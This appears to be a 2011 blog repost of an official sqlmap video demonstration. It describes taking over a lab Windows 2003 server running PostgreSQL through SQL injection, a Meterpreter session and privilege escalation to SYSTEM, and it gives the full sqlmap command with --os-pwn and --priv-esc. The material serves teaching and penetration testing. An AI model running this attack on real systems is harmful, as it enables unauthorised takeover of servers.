Thursday, September 15, 2011

HOWTO : Offical SQLMap video demonstration 10

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server then escalating database process' user privileges to SYSTEM. sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database.

Then it asks the user for options to create the Metasploit shellcode and executes it in-memory within the database process via the injected sys_bineval() user-defined function.

The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/iis/get_int_84.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

That's all! See you.